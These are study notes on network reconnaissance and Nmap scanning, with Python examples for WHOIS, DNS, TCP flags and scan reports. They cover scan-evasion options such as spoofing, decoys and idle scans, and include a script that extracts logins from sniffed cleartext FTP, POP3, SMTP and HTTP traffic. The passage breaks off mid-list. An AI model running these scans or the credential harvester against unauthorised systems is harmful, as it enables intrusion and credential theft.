Network Security 101

tags: cyber security network security recon nmap

Passive Recon

We use:

  • whois to query WHOIS servers
  • nslookup to query DNS servers
  • dig to query DNS servers
  • DNSDumpster
  • Shodan.io

These are all publicly available records and hence do not alert the target.
Passive recon relies on publicly available knowledge which can be accessed without directly interacting with the target.

Whois

WHOIS is a request and response protocol that follows the RFC 3912 specification. A WHOIS server listens on TCP port 43 for incoming requests. The domain registrar is responsible for maintaining the WHOIS records for the domain names it is leasing. The WHOIS server replies with:

  • Registrar: Via which registrar was the domain name registered?
  • Contact info of registrant: Name, organization, address, phone, among other things. (unless made hidden via a privacy service)
  • Creation, update, and expiration dates: When was the domain name first registered? When was it last updated? And when does it need to be renewed?
  • Name Server: Which server to ask to resolve the domain name?
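The exchange above is simple enough to do by hand. As an added example (not code from the original notes), the script below is a minimal RFC 3912 client plus a parser that pulls out the fields listed above and flags a privacy-redacted registrant; the WHOIS server name is an assumption (use the registry or registrar that serves your TLD), and the sample response is constructed test data, not a real record.

```python
# Added example (not from the original page): a minimal RFC 3912 WHOIS client and a
# parser for the fields listed above. The WHOIS server name is an assumption (change it to
# the registry or registrar that serves your TLD); SAMPLE_RESPONSE is constructed test data.
import re
import socket


def whois_query(domain: str, server: str = "whois.iana.org", port: int = 43,
                timeout: float = 10.0) -> str:
    """RFC 3912 exchange: TCP connect to port 43, send 'query<CR><LF>', read until the server closes."""
    with socket.create_connection((server, port), timeout=timeout) as sock:
        sock.sendall(domain.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:            # the server closes the connection when the answer is complete
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


# Labels as they appear in typical registry/registrar output (RFC 3912 defines no record format).
_SINGLE = {
    "registrar": r"^\s*Registrar:\s*(.+?)\s*$",
    "registrant_org": r"^\s*Registrant Organization:\s*(.+?)\s*$",
    "created": r"^\s*Creation Date:\s*(\S+)",
    "updated": r"^\s*Updated Date:\s*(\S+)",
    "expires": r"^\s*(?:Registry Expiry|Registrar Registration Expiration|Expiration|Expiry) Date:\s*(\S+)",
}


def parse_whois(text: str) -> dict:
    """Extract registrar, registrant, dates and name servers; flag privacy-redacted contacts."""
    out = {}
    for key, pattern in _SINGLE.items():
        m = re.search(pattern, text, re.MULTILINE | re.IGNORECASE)
        out[key] = m.group(1) if m else None
    # 'Name Server:' repeats once per server; normalise case so sets compare cleanly.
    servers = re.findall(r"^\s*Name Server:\s*(\S+)", text, re.MULTILINE | re.IGNORECASE)
    out["name_servers"] = sorted({s.lower() for s in servers})
    org = out["registrant_org"] or ""
    out["privacy_protected"] = bool(re.search(r"redacted|privacy|proxy", org, re.IGNORECASE))
    return out


# Constructed sample in the common registry style; it describes no real domain.
SAMPLE_RESPONSE = """\
Domain Name: EXAMPLE.TEST
Registrar: Example Registrar, Inc.
Registrar WHOIS Server: whois.example-registrar.test
Updated Date: 2023-05-06T07:08:09Z
Creation Date: 2010-01-02T03:04:05Z
Registry Expiry Date: 2030-01-02T03:04:05Z
Registrant Organization: REDACTED FOR PRIVACY
Name Server: NS2.EXAMPLE.TEST
Name Server: NS1.EXAMPLE.TEST
"""

if __name__ == "__main__":
    for key, value in parse_whois(SAMPLE_RESPONSE).items():
        print(f"{key:18} {value}")
    # Live use (needs network), e.g. for a .com name via the registry server:
    # print(parse_whois(whois_query("example.com", "whois.verisign-grs.com")))
```

The IANA server only tells you which registry is authoritative for a TLD; a second query to that registry (and often a third to the registrar named in the reply) is needed for the full record, which is what the whois command-line tool does for you.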

nslookup vs dig

You can use nslookup OPTIONS DOMAIN_NAME SERVER
The three main parameters are:

  • OPTIONS contains the query type, given as -type=TYPE, where TYPE is one of the records in the table below, e.g. -type=A for IPv4 addresses and -type=AAAA for IPv6 addresses.
  • DOMAIN_NAME is the domain name you are looking up.
  • SERVER is the DNS server that you want to query. You can choose any local or public DNS server to query. Cloudflare offers 1.1.1.1 and 1.0.0.1, Google offers 8.8.8.8 and 8.8.4.4, and Quad9 offers 9.9.9.9 and 149.112.112.112. You can opt for others as well.

Query   Result
A       IPv4 addresses
AAAA    IPv6 addresses
CNAME   Canonical name
MX      Mail servers
SOA     Start of authority
TXT     TXT records

Dig provides more details than nslookup, and its syntax is as shown below:

dig tryhackme.com MX

# If you want to query the 1.1.1.1 DNS server, you can execute:
dig @1.1.1.1 tryhackme.com MX
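To see what dig and nslookup actually put on the wire, the following added example (not code from the original notes) builds an RFC 1035 query for the record types in the table above, parses the answer section including name-compression pointers, and checks the 16-bit transaction ID, which is the only thing stopping an off-path attacker from answering before the real resolver does. The 1.1.1.1 resolver is the one named on this page; the name example.test and SAMPLE_RESPONSE are constructed test data.

```python
# Added example (not from the original page): DNS query/response at the wire level.
# Resolver 1.1.1.1 is taken from the notes; example.test and SAMPLE_RESPONSE are constructed.
import ipaddress
import os
import socket
import struct

QTYPES = {"A": 1, "NS": 2, "CNAME": 5, "SOA": 6, "MX": 15, "TXT": 16, "AAAA": 28}
QTYPE_NAMES = {v: k for k, v in QTYPES.items()}


def encode_name(name: str) -> bytes:
    """'example.test' -> b'\\x07example\\x04test\\x00' (length-prefixed labels, zero terminator)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError(f"bad label {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name: str, qtype: str, qid: int = 0x1234) -> bytes:
    """12-byte header (ID, flags with RD=1 as dig sets by default, QDCOUNT=1) + question."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPES[qtype], 1)  # QCLASS 1 = IN


def decode_name(msg: bytes, off: int):
    """Read a (possibly compressed) name at off; return (name, offset just past it in the stream)."""
    labels, end, jumped = [], None, False
    for _ in range(128):                     # bound the walk so a malicious pointer loop cannot hang us
        length = msg[off]
        if length & 0xC0 == 0xC0:            # pointer: 14-bit offset into the message
            if not jumped:
                end = off + 2
            off = ((length & 0x3F) << 8) | msg[off + 1]
            jumped = True
            continue
        off += 1
        if length == 0:
            return ".".join(labels), (end if jumped else off)
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    raise ValueError("compression pointer loop")


def parse_response(msg: bytes, expect_id=None):
    """Return (rcode, [(name, type, ttl, rdata_text), ...]) for the answer section."""
    qid, flags, qd, an, _ns, _ar = struct.unpack_from("!HHHHHH", msg, 0)
    if expect_id is not None and qid != expect_id:
        raise ValueError("transaction ID mismatch: not the answer to our query")
    off = 12
    for _ in range(qd):                      # skip the echoed question(s): name + QTYPE + QCLASS
        _, off = decode_name(msg, off)
        off += 4
    answers = []
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
        off += 10
        rdata = msg[off:off + rdlen]
        if rtype in (1, 28):                 # A / AAAA: raw address bytes
            text = str(ipaddress.ip_address(rdata))
        elif rtype in (2, 5):                # NS / CNAME: one name, may be compressed
            text, _ = decode_name(msg, off)
        elif rtype == 15:                    # MX: 16-bit preference + exchange name
            pref = struct.unpack_from("!H", rdata)[0]
            exchange, _ = decode_name(msg, off + 2)
            text = f"{pref} {exchange}"
        elif rtype == 16:                    # TXT: one or more <len><chars> strings
            parts, i = [], 0
            while i < rdlen:
                n = rdata[i]
                parts.append(rdata[i + 1:i + 1 + n].decode("ascii", errors="replace"))
                i += 1 + n
            text = "".join(parts)
        else:
            text = rdata.hex()
        answers.append((name, QTYPE_NAMES.get(rtype, str(rtype)), ttl, text))
        off += rdlen
    return flags & 0x0F, answers             # low 4 bits of flags = RCODE (0 = NOERROR)


def resolve(name: str, qtype: str, server: str = "1.1.1.1", timeout: float = 3.0):
    """Network equivalent of 'dig @1.1.1.1 NAME TYPE' over UDP/53 (not exercised offline)."""
    qid = int.from_bytes(os.urandom(2), "big")   # unpredictable ID, as any real resolver uses
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, qtype, qid), (server, 53))
        data, _ = s.recvfrom(4096)
    return parse_response(data, expect_id=qid)


# Constructed answer to 'example.test MX': two MX records whose owner and exchange names use
# pointers (0xC00C) back to the question name at offset 12, as real servers do.
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 2, 0, 0)            # response, RD+RA, NOERROR
    + encode_name("example.test") + struct.pack("!HH", 15, 1)       # echoed question
    + b"\xc0\x0c" + struct.pack("!HHIHH", 15, 1, 300, 8, 10) + b"\x03mx1\xc0\x0c"
    + b"\xc0\x0c" + struct.pack("!HHIHH", 15, 1, 300, 8, 20) + b"\x03mx2\xc0\x0c"
)

if __name__ == "__main__":
    print(build_query("example.test", "MX").hex())
    print(parse_response(SAMPLE_RESPONSE, expect_id=0x1234))
```

The bounded loop in decode_name matters when parsing answers from untrusted servers: a pointer that points at itself is a classic way to hang a naive parser.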

dnsdumpster

DNSDumpster (dnsdumpster.com) is a good go-to: it collects subdomains, DNS records and hosting details from public sources, so nothing is sent to the target.

Shodan

Shodan.io is a good go-to: it indexes what Internet-connected hosts expose (open ports, service banners), so you can see a target's exposed services without scanning it yourself.

Active Recon

Telnet

  • Telnet was developed in 1969 to communicate with a remote system via a command-line interface. It uses the Telnet protocol (TCP port 23 by default) for remote administration.
  • Telnet sends all the data, including usernames and passwords, in cleartext.
  • Sending in cleartext makes it easy for anyone who has access to the communication channel to steal the login credentials.
  • The secure alternative is the SSH (Secure Shell) protocol.
  • The telnet client is also a handy raw TCP client for talking to other text-based protocols by hand, e.g. fetching a page over HTTP:

telnet [ip] [port]
GET / HTTP/1.1
Host: telnet
# press Enter twice: the blank line ends the request headers and the server replies

nmap

Here is a link to the nmap 101 series.

  • You can provide a file as input for your list of targets: nmap -iL list_of_hosts.txt.
  • To check the list of hosts that Nmap will scan without scanning them, use nmap -sL TARGETS; add the -n flag to disable DNS resolution.
  • ARP has one purpose: sending a frame to the broadcast address on the network segment and asking the computer with a specific IP address to respond by providing its MAC (hardware) address.
  • If you want to ping a system on the same subnet, an ARP query should precede the ICMP Echo.
  • Although TCP and UDP are transport-layer protocols, for network scanning purposes a scanner can send a specially crafted packet to common TCP or UDP ports to check whether the target will respond. This method is efficient, especially when ICMP Echo is blocked.

When no host discovery options are provided, Nmap follows the following approaches to discover live hosts:

  1. When a privileged user tries to scan targets on a local network (Ethernet), Nmap uses ARP requests. A privileged user is root or a user who belongs to sudoers and can run sudo.
  2. When a privileged user tries to scan targets outside the local network, Nmap uses ICMP echo requests, TCP ACK (Acknowledge) to port 80, TCP SYN (Synchronize) to port 443, and ICMP timestamp request.
  3. When an unprivileged user tries to scan targets outside the local network, Nmap resorts to a TCP 3-way handshake by sending SYN packets to ports 80 and 443.

To use Nmap to discover online hosts without port-scanning the live systems, you can issue nmap -sn TARGETS

  • ARP scan is possible only if you are on the same subnet as the target systems.
  • On Ethernet (802.3) and WiFi (802.11) networks, you need to know the MAC address of any system before you can communicate with it.
  • The MAC address is necessary for the link-layer header; the header contains the source MAC address and the destination MAC address among other fields.
  • To get the MAC address, the OS sends an ARP query. A host that replies to ARP queries is up. The ARP query only works if the target is on the same subnet as yourself, i.e., on the same Ethernet/WiFi.
  • To perform an ARP scan without port-scanning, you can use nmap -PR -sn TARGETS, where -PR indicates that you only want an ARP scan.
  • To scan for alive hosts on the subnet using ICMP use nmap -PE -sn MACHINE_IP/24. This scan will send ICMP echo packets to every IP address on the subnet.
  • Because ICMP echo requests tend to be blocked, consider using ICMP Timestamp or ICMP Address Mask requests to tell if a system is online.
  • Nmap uses timestamp request (ICMP Type 13) and checks whether it will get a Timestamp reply (ICMP Type 14). The -PP option tells Nmap to use ICMP timestamp requests. nmap -PP -sn MACHINE_IP/24 can be used to discover alive hosts on the target subnet.
  • Nmap uses address mask queries (ICMP Type 17) and checks whether it gets an address mask reply (ICMP Type 18). This scan can be enabled with the option -PM. nmap -PM -sn MACHINE_IP/24
  • To use TCP SYN ping, you can do so via the option -PS followed by the port number, range, list, or a combination of them.

arp-scan

arp-scan is a scanner built around ARP queries (it needs root, as it writes raw frames).
arp-scan --localnet (or arp-scan -l) sends ARP queries to all valid IP addresses on your local networks.
You can also specify the interface with -I, e.g. sudo arp-scan -I eth0 -l, which sends ARP queries for all valid IP addresses on the eth0 interface's subnet.
Note that the packet captures for arp-scan and nmap -PR -sn show similar traffic patterns.

Host discovery with TCP and UDP

TCP SYN scan

# To get nmap to use TCP SYN ping, use the flag -PS followed by the port number, range, list, or a combination of them.
# example: target port 21
nmap -PS21 TARGETS
# example: target ports 21, 22, 23, 24, and 25
nmap -PS21-25 TARGETS
# example: target three ports 80, 443, and 8080
nmap -PS80,443,8080 TARGETS

TCP ACK scan

# requires elevated privileges
# The syntax is similar to TCP SYN ping: -PA should be followed by a port number, range, list, or a combination of them.
# If no port is specified, port 80 will be used.
# example: target port 21
nmap -PA21 TARGETS
# example: target ports 21, 22, 23, 24, and 25
nmap -PA21-25 TARGETS
# example: target three ports 80, 443, and 8080
nmap -PA80,443,8080 TARGETS
# to discover the online hosts on the target's subnet
sudo nmap -PA -sn MACHINE_IP/24

UDP ping

Similar to TCP SYN and ACK ping, except that the flag used is -PU, followed by ports in the same way (e.g. -PU53). A closed UDP port answers with an ICMP port unreachable, which is enough to show the host is up; an open port usually stays silent.

Masscan

Masscan uses a similar approach to discover the available systems. However, to finish its network scan quickly, it is quite aggressive with the rate of packets it generates.

masscan MACHINE_IP/24 -p443
masscan MACHINE_IP/24 -p80,443
masscan MACHINE_IP/24 -p22-25
masscan MACHINE_IP/24 --top-ports 100

Using Reverse DNS lookup

Use the -R flag to enable this: Nmap then does a reverse-DNS lookup for every target address, including hosts that do not respond (by default it only resolves hosts that are up).

Nmap Cheat sheet

Scan type                 Command
ARP Scan                  sudo nmap -PR -sn MACHINE_IP/24
ICMP Echo Scan            sudo nmap -PE -sn MACHINE_IP/24
ICMP Timestamp Scan       sudo nmap -PP -sn MACHINE_IP/24
ICMP Address Mask Scan    sudo nmap -PM -sn MACHINE_IP/24
TCP SYN Ping Scan         sudo nmap -PS22,80,443 -sn MACHINE_IP/30
TCP ACK Ping Scan         sudo nmap -PA22,80,443 -sn MACHINE_IP/30
UDP Ping Scan             sudo nmap -PU53,161,162 -sn MACHINE_IP/30

Flag    Purpose
-n      no DNS lookup
-R      reverse-DNS lookup for all hosts
-sn     host discovery only

nmap basic port scans

The TCP header flags are:

  1. URG: Urgent flag indicates that the urgent pointer field is significant. The urgent pointer marks the incoming data as urgent, so a TCP segment with the URG flag set is processed immediately without waiting on previously sent TCP segments.
  2. ACK: Acknowledgement flag indicates that the acknowledgement number is significant. It is used to acknowledge the receipt of a TCP segment.
  3. PSH: Push flag asks TCP to pass the data to the application promptly.
  4. RST: Reset flag is used to reset the connection. Another device, such as a firewall, might send it to tear down a TCP connection. This flag is also used when data is sent to a host and there is no service on the receiving end to answer.
  5. SYN: Synchronize flag is used to initiate a TCP 3-way handshake and synchronize sequence numbers with the other host. The initial sequence number should be chosen randomly during TCP connection establishment.
  6. FIN: The sender has no more data to send.

Port scan type      Example command
TCP connect scan    nmap -sT ip
TCP SYN scan        sudo nmap -sS ip
UDP scan            sudo nmap -sU ip

Flag                   Purpose
-p-                    all ports
-p1-1023               ports 1 to 1023 inclusive
-F                     100 most common ports
-r                     scan ports in consecutive order
-T<0-5>                paranoid (0), sneaky (1), polite (2), normal (3), aggressive (4), insane (5)
--max-rate 50          rate <= 50 packets/sec
--min-rate 15          rate >= 15 packets/sec
--min-parallelism 100  at least 100 probes in parallel

nmap Advanced port scans

Scan type                       Command
TCP Null Scan                   sudo nmap -sN [ip]
TCP FIN Scan                    sudo nmap -sF [ip]
TCP Xmas Scan                   sudo nmap -sX [ip]
TCP Maimon Scan                 sudo nmap -sM [ip]
TCP ACK Scan                    sudo nmap -sA [ip]
TCP Window Scan                 sudo nmap -sW [ip]
Custom TCP Scan                 sudo nmap --scanflags URGACKPSHRSTSYNFIN [ip]
Spoofed Source IP               sudo nmap -S SPOOFED_IP [ip]
Spoofed MAC Address             sudo nmap --spoof-mac SPOOFED_MAC [ip]
Decoy Scan                      nmap -D DECOY_IP,ME 10.10.96.13
Idle (Zombie) Scan              sudo nmap -sI ZOMBIE_IP 10.10.96.13
Fragment IP data into 8 bytes   -f
Fragment IP data into 16 bytes  -ff

With -S the replies go to SPOOFED_IP, so the scan only yields results if you can capture that address's traffic, and Nmap usually needs -e to be told which interface to send on.

Option                  Purpose
--source-port PORT_NUM  specify source port number
--data-length NUM       append random data to reach given length
--reason                explains how Nmap made its conclusion
-v                      verbose
-vv                     very verbose
-d                      debugging
-dd                     detailed debugging
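The basic and advanced scan types in the two tables above differ only in which bits of the TCP flag byte the probe sets and in how the reply (or silence) is interpreted. The following added example (not code from the original notes) encodes the six flags listed under the basic port scans, accepts the same flag string --scanflags takes, builds a complete 20-byte TCP header with a valid checksum over the IPv4 pseudo-header, and maps a reply to the port state Nmap would report. The addresses and ports are made-up sample values; nothing is sent on the wire.

```python
# Added example (not from the original page): TCP flag byte, header construction and reply
# interpretation for the scan types in the notes. Sample IPs/ports are constructed.
import socket
import struct

FLAG_BITS = {"URG": 0x20, "ACK": 0x10, "PSH": 0x08, "RST": 0x04, "SYN": 0x02, "FIN": 0x01}

# Flags each scan type sets in its probe.
SCAN_PROBE = {
    "-sS": "SYN",         # SYN scan: half-open; an open port answers SYN/ACK
    "-sA": "ACK",         # ACK scan: maps firewall rules (unfiltered/filtered), not open ports
    "-sW": "ACK",         # Window scan: like ACK, but reads the window size of the RST reply
    "-sN": "",            # Null scan: no flags at all
    "-sF": "FIN",         # FIN scan
    "-sX": "FINPSHURG",   # Xmas scan: FIN, PSH and URG lit up
    "-sM": "FINACK",      # Maimon scan
}


def parse_scanflags(spec: str) -> int:
    """Turn 'URGACKPSHRSTSYNFIN' (the --scanflags spelling) or 'SYN,ACK' into the flag byte."""
    spec = spec.upper().replace(",", "").replace(" ", "")
    bits = 0
    while spec:
        for name, bit in FLAG_BITS.items():
            if spec.startswith(name):
                bits |= bit
                spec = spec[len(name):]
                break
        else:
            raise ValueError(f"unknown flag at {spec!r}")
    return bits


def flag_names(bits: int) -> str:
    return "".join(name for name, bit in FLAG_BITS.items() if bits & bit)


def ones_complement_sum(data: bytes) -> int:
    """Fold the 16-bit one's-complement sum used by the IP/TCP/UDP checksums."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def _pseudo_header(src_ip: str, dst_ip: str, tcp_length: int) -> bytes:
    return (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
            + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_length))


def build_tcp_segment(src_ip, dst_ip, sport, dport, flags, seq=0, ack=0, window=1024, payload=b""):
    """20-byte TCP header (no options) + payload, checksum per RFC 793 over the pseudo-header."""
    data_offset = 5 << 4                       # header length in 32-bit words, upper nibble of byte 12
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, data_offset, flags, window, 0, 0)
    csum = (~ones_complement_sum(_pseudo_header(src_ip, dst_ip, len(header) + len(payload))
                                 + header + payload)) & 0xFFFF
    return header[:16] + struct.pack("!H", csum) + header[18:] + payload


def verify_tcp_checksum(src_ip, dst_ip, segment: bytes) -> bool:
    """A correct checksum makes the one's-complement sum of pseudo-header + segment all ones."""
    return ones_complement_sum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0xFFFF


def tcp_flags(segment: bytes) -> int:
    return segment[13]                         # byte 13 of the TCP header holds the flags


def classify(scan: str, reply_flags, reply_window: int = 0) -> str:
    """Port state Nmap reports for one probe; reply_flags=None means no reply before the timeout.
    ICMP unreachable replies (also reported as 'filtered') are not modelled here."""
    if scan not in SCAN_PROBE:
        raise ValueError(f"unknown scan type {scan}")
    if reply_flags is None:
        return "filtered" if scan in ("-sS", "-sA", "-sW") else "open|filtered"
    rst = bool(reply_flags & FLAG_BITS["RST"])
    if scan == "-sS":
        if rst:
            return "closed"
        if reply_flags & FLAG_BITS["SYN"] and reply_flags & FLAG_BITS["ACK"]:
            return "open"
        return "unknown"
    if scan == "-sA":
        return "unfiltered" if rst else "unknown"
    if scan == "-sW":
        if not rst:
            return "unknown"
        return "open" if reply_window > 0 else "closed"
    return "closed" if rst else "unknown"      # -sN/-sF/-sX/-sM: only a RST is ever expected


if __name__ == "__main__":
    for scan, spec in SCAN_PROBE.items():
        bits = parse_scanflags(spec)
        print(f"{scan}: flags=0x{bits:02x} ({flag_names(bits) or 'none'})")
    probe = build_tcp_segment("10.0.0.5", "10.0.0.9", 40000, 80, parse_scanflags("SYN"))
    print(probe.hex(), verify_tcp_checksum("10.0.0.5", "10.0.0.9", probe))
```

The Null/FIN/Xmas/Maimon rows share one weakness that the classify function makes visible: they can never say "open" on their own, because an RFC-compliant open port simply ignores the probe, and many Windows and Cisco stacks answer every such probe with a RST regardless of port state.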

nmap reports

Option                   Meaning
-sV                      determine service/version info on open ports
-sV --version-light      try the most likely probes (intensity 2)
-sV --version-all        try all available probes (intensity 9)
-O                       detect OS
--traceroute             run traceroute to target
--script=SCRIPTS         Nmap scripts to run
-sC or --script=default  run default scripts
-A                       equivalent to -sV -O -sC --traceroute
-oN                      save output in normal format
-oG                      save output in grepable format
-oX                      save output in XML format
-oA                      save output in normal, XML and grepable formats
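The -oX and -oG formats exist so results can be processed by a script rather than read by eye. The following added example (not code from the original notes) parses both, then flags open ports running one of the cleartext protocols listed under "Protocols and servers" further down. Both samples are constructed to look like Nmap 7.x output for an imaginary 10.0.0.0/30 with a host named gw.example.test; nothing is scanned.

```python
# Added example (not from the original page): parse -oX and -oG reports and flag cleartext
# services. SAMPLE_XML and SAMPLE_GREPABLE are constructed, not real scan output.
import re
import xml.etree.ElementTree as ET

CLEARTEXT = {"ftp", "telnet", "http", "pop3", "imap", "smtp"}


def parse_nmap_xml(xml_text: str):
    """-oX: one dict per host that is up, with its ports and service/version strings."""
    hosts = []
    for host in ET.fromstring(xml_text).iter("host"):
        if host.find("status").get("state") != "up":
            continue
        addrs = {a.get("addrtype"): a.get("addr") for a in host.iter("address")}
        hostname = host.find("hostnames/hostname")
        ports = []
        for port in host.iter("port"):
            state, svc = port.find("state"), port.find("service")
            version = " ".join(filter(None, [svc.get("product"), svc.get("version")])) if svc is not None else ""
            ports.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state.get("state"),
                "reason": state.get("reason"),        # e.g. syn-ack / reset, what --reason prints
                "service": svc.get("name") if svc is not None else None,
                "version": version,
            })
        hosts.append({"ip": addrs.get("ipv4"), "mac": addrs.get("mac"),
                      "hostname": hostname.get("name") if hostname is not None else None,
                      "ports": ports})
    return hosts


# One grepable port entry: port/state/proto/owner/service/rpc-info/version/
_GREP_PORT = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_nmap_grepable(text: str):
    """-oG: each 'Host:' line with a 'Ports:' field carries comma-separated port entries."""
    hosts = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        m = re.match(r"Host: (\S+) \(([^)]*)\)", line)
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]   # fields are tab-separated
        ports = [{"port": int(p), "state": st, "proto": pr, "service": svc, "version": ver.strip()}
                 for p, st, pr, _owner, svc, _rpc, ver in _GREP_PORT.findall(ports_field)]
        hosts.append({"ip": m.group(1), "hostname": m.group(2) or None, "ports": ports})
    return hosts


def cleartext_exposure(hosts):
    """(ip, port, service) for every open port running a cleartext protocol."""
    return [(h["ip"], p["port"], p["service"]) for h in hosts for p in h["ports"]
            if p["state"] == "open" and p["service"] in CLEARTEXT]


SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX - 10.0.0.0/30" version="7.94">
<host><status state="up" reason="arp-response"/>
<address addr="10.0.0.1" addrtype="ipv4"/><address addr="00:11:22:33:44:55" addrtype="mac"/>
<hostnames><hostname name="gw.example.test" type="PTR"/></hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
<port protocol="tcp" portid="23"><state state="open" reason="syn-ack"/><service name="telnet"/></port>
<port protocol="tcp" portid="80"><state state="closed" reason="reset"/><service name="http"/></port>
</ports></host>
<host><status state="down" reason="no-response"/><address addr="10.0.0.2" addrtype="ipv4"/></host>
</nmaprun>"""

SAMPLE_GREPABLE = (
    "# Nmap 7.94 scan initiated as: nmap -sV -oG - 10.0.0.0/30\n"
    "Host: 10.0.0.1 (gw.example.test)\tStatus: Up\n"
    "Host: 10.0.0.1 (gw.example.test)\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, "
    "23/open/tcp//telnet///, 80/closed/tcp//http///\tIgnored State: filtered (997)\n"
)

if __name__ == "__main__":
    print(cleartext_exposure(parse_nmap_xml(SAMPLE_XML)))
    print(cleartext_exposure(parse_nmap_grepable(SAMPLE_GREPABLE)))
```

Prefer the XML for anything beyond a quick grep: the grepable format is documented as deprecated, and it drops the per-port reason and script output that the XML keeps.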

script types

script category description
auth Authentication related scripts
broadcast Discover hosts by sending broadcast messages
brute Performs brute-force password auditing against logins
default Default scripts, same as -sC
discovery Retrieve accessible information, such as database tables and DNS names
dos Detects servers vulnerable to Denial of Service (DoS)
exploit Attempts to exploit various vulnerable services
external Checks using a third-party service, such as Geoplugin and Virustotal
fuzzer Launch fuzzing attacks
intrusive Intrusive scripts such as brute-force attacks and exploitation
malware Scans for backdoors
safe Safe scripts that won’t crash the target
version Retrieve service versions
vuln Checks for vulnerabilities or exploit vulnerable services

Protocols and servers

Protocol  TCP port  Application     Data security
FTP       21        file transfer   cleartext
HTTP      80        www             cleartext
IMAP      143       Email MDA       cleartext
POP3      110       Email MDA       cleartext
SMTP      25        Email MTA       cleartext
Telnet    23        remote access   cleartext

Servers implementing these protocols are subject to different kinds of attacks. To name a few, consider:

  • Sniffing Attack (Network Packet Capture)
  • Man-in-the-Middle (MITM) Attack
  • Password Attack (Authentication Attack)
  • Vulnerabilities

Sniffing Attack

For Capturing network packets consider:

  1. Tcpdump - a free open source command-line interface (CLI) program that has been ported to work on many operating systems.
  2. Wireshark - a free open source graphical user interface (GUI) program available for several operating systems, including Linux, macOS and MS Windows.
  3. Tshark - a CLI alternative to Wireshark.
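What a sniffer actually hands an attacker is shown by the following added example (not code from the original notes). Given the client-to-server payload of a captured session, as reassembled by Wireshark's "Follow TCP Stream" or tshark's follow option, it pulls logins out of the cleartext protocols in the table above: FTP and POP3 USER/PASS, SMTP AUTH PLAIN and AUTH LOGIN, and HTTP Basic Authorization. The sample streams, hosts and accounts are constructed.

```python
# Added example (not from the original page): harvest logins from reassembled cleartext
# client->server streams. All sample streams below are constructed test data.
import base64
import re


def _b64(token: str):
    """Decode a base64 token, or return None if it is not valid base64."""
    try:
        return base64.b64decode(token.strip(), validate=True).decode("utf-8", errors="replace")
    except ValueError:                       # binascii.Error is a ValueError
        return None


def extract_credentials(stream: bytes, dst_port: int):
    """Return [(protocol, username, password), ...] found in one client->server stream."""
    text = stream.decode("utf-8", errors="replace")
    lines = [l.rstrip("\r") for l in text.split("\n")]
    found = []

    if dst_port in (21, 110):                # FTP / POP3: 'USER x' followed by 'PASS y'
        proto = "ftp" if dst_port == 21 else "pop3"
        user = None
        for line in lines:
            m = re.match(r"(?i)(USER|PASS)\s+(.*)", line)
            if not m:
                continue
            if m.group(1).upper() == "USER":
                user = m.group(2)
            elif user is not None:
                found.append((proto, user, m.group(2)))
                user = None

    elif dst_port in (25, 587):              # SMTP: SASL PLAIN or LOGIN, base64 but not encrypted
        i = 0
        while i < len(lines):
            line = lines[i]
            m = re.match(r"(?i)AUTH\s+PLAIN\s*(\S*)", line)
            if m:
                blob = m.group(1)
                if not blob and i + 1 < len(lines):   # initial response may come on the next line
                    i += 1
                    blob = lines[i]
                decoded = _b64(blob)
                parts = decoded.split("\0") if decoded is not None else []
                if len(parts) == 3:          # [authzid, authcid, password]
                    found.append(("smtp", parts[1], parts[2]))
            else:
                m = re.match(r"(?i)AUTH\s+LOGIN\s*(\S*)", line)
                if m:
                    if m.group(1):           # username sent inline with the command
                        user = _b64(m.group(1))
                        password = _b64(lines[i + 1]) if i + 1 < len(lines) else None
                        i += 1
                    else:                    # username and password on the next two lines
                        user = _b64(lines[i + 1]) if i + 1 < len(lines) else None
                        password = _b64(lines[i + 2]) if i + 2 < len(lines) else None
                        i += 2
                    if user is not None and password is not None:
                        found.append(("smtp", user, password))
            i += 1

    elif dst_port in (80, 8080):             # HTTP Basic: base64("user:pass") in a header
        for m in re.finditer(r"(?im)^Authorization:\s*Basic\s+(\S+)", text):
            decoded = _b64(m.group(1))
            if decoded and ":" in decoded:
                user, password = decoded.split(":", 1)
                found.append(("http", user, password))

    return found


# Constructed (dst_port, client->server bytes) pairs, one per protocol in the table above.
SAMPLES = [
    (21, b"USER alice\r\nPASS Winter2024!\r\nPWD\r\n"),
    (110, b"USER bob@example.test\r\nPASS hunter2\r\nSTAT\r\n"),
    (25, b"EHLO laptop\r\nAUTH PLAIN " + base64.b64encode(b"\0carol\0s3cret") + b"\r\nMAIL FROM:<carol@example.test>\r\n"),
    (25, b"EHLO laptop\r\nAUTH LOGIN\r\n" + base64.b64encode(b"dave") + b"\r\n" + base64.b64encode(b"pa55word") + b"\r\n"),
    (80, b"GET /admin HTTP/1.1\r\nHost: intranet.example.test\r\nAuthorization: Basic " + base64.b64encode(b"erin:letmein") + b"\r\n\r\n"),
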